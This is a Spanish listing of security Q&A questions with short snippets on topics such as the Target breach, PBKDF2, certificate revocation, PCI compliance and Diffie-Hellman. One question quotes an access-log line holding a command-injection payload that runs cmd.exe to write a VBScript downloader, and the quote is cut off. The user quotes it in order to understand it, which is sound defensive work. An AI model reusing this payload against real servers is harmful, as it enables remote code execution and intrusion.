Todas las preguntas

2
respuestas

¿El chip-and-PIN hubiera prevenido la violación de Target?

¿El chip y el PIN habrían evitado la violación de Target? Como todos sabemos, Target fue violado y los hackers robaron muchos números de tarjetas de crédito. Target ahora aboga por el chip y el PIN, como una forma de proporcionar una mejor se...
pregunta 24.05.2014 - 02:40
2
respuestas

¿Deben cuidarse los certificados comprometidos caducados si la hora siempre es correcta?

Estoy intentando configurar una CA para mi empresa y emitir a cada empleado un certificado digital y una clave privada. Me preocupa la revocación y el vencimiento. En mi caso, el certificado raíz de CA se usa para verificar las identidades de...
pregunta 21.08.2014 - 11:47
3
respuestas

Limitar el intento de inicio de sesión de usuario contra PBKDF2

Mi jefe me ha asignado la tarea de cambiar el sistema de cifrado de nuestra aplicación web de MD5 a PBKDF2, ya que MD5 / SHA1 se ha demostrado que se puede romper en los últimos años. Discutí contra eso y pensé que deberíamos permitir a los u...
pregunta 13.01.2014 - 09:45
2
respuestas

¿Es un verdadero beneficio de seguridad si un host utiliza direcciones IP estáticas para la autenticación?

Como mi conocimiento sobre seguridad de la información no es tan bueno y Google no me dio una respuesta satisfactoria, me gustaría preguntarle a la comunidad aquí: Estoy trabajando para una empresa que ofrece servicios en línea (como ASP) don...
pregunta 27.03.2014 - 21:20
5
respuestas

Usando un lado del navegador de cifrado de clave pública para evitar el cumplimiento de PCI

Estamos desarrollando una aplicación web en la que ciertos usuarios no registrados (clientes) deben enviar los datos de su tarjeta de crédito a otros usuarios (comerciantes), que, suponemos, son compatibles con PCI. Estamos estudiando el cump...
pregunta 01.08.2014 - 00:35
2
respuestas

solicitud http sospechosa en los registros

Encontré esta solicitud en mi Ubuntu 14.04 apache2 access.log: xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%...
pregunta 26.09.2014 - 02:19
2
respuestas

Explotación de seguridad WIFI gratuita

Así que estaba viendo algunos videos de aprendizaje de Backtrack y cosas similares, y me di cuenta de que siempre se habla de cómo obtener información de las personas. Por ejemplo, si alguien que usa WIFI no seguro puede ver en qué páginas está...
pregunta 19.01.2014 - 00:01
1
respuesta

Intercambio de claves autenticado de Diffie Hellman

Parece que la versión de libro de texto de Diffie-Hellman es susceptible al ataque del hombre en el medio y el uso de firmas digitales podría evitar que ocurra este ataque. Las firmas digitales podrían implementarse durante el intercambio de...
pregunta 18.11.2014 - 12:12
3
respuestas

Aprendiendo a usar herramientas de script en Python y pruebas generales de lápiz

Quiero aprender Pruebas de lápiz y ya conozco Java, he estado aprendiendo Python y estoy bastante cómodo con la sintaxis de Python. También tengo algunos conocimientos sobre Linux y TCP / IP. Mis preguntas son: ¿Cómo puedo aprender a usar las...
pregunta 28.12.2013 - 21:11
2
respuestas

Configuración del antivirus: ¿eliminar o poner en cuarentena el archivo?

Entiendo que la mayoría de los antivirus de forma predeterminada ponen en cuarentena los archivos infectados. Lo he cambiado para eliminar todos los archivos infectados inmediatamente. ¿Esto causaría más daño que bien?     
pregunta 02.08.2014 - 15:25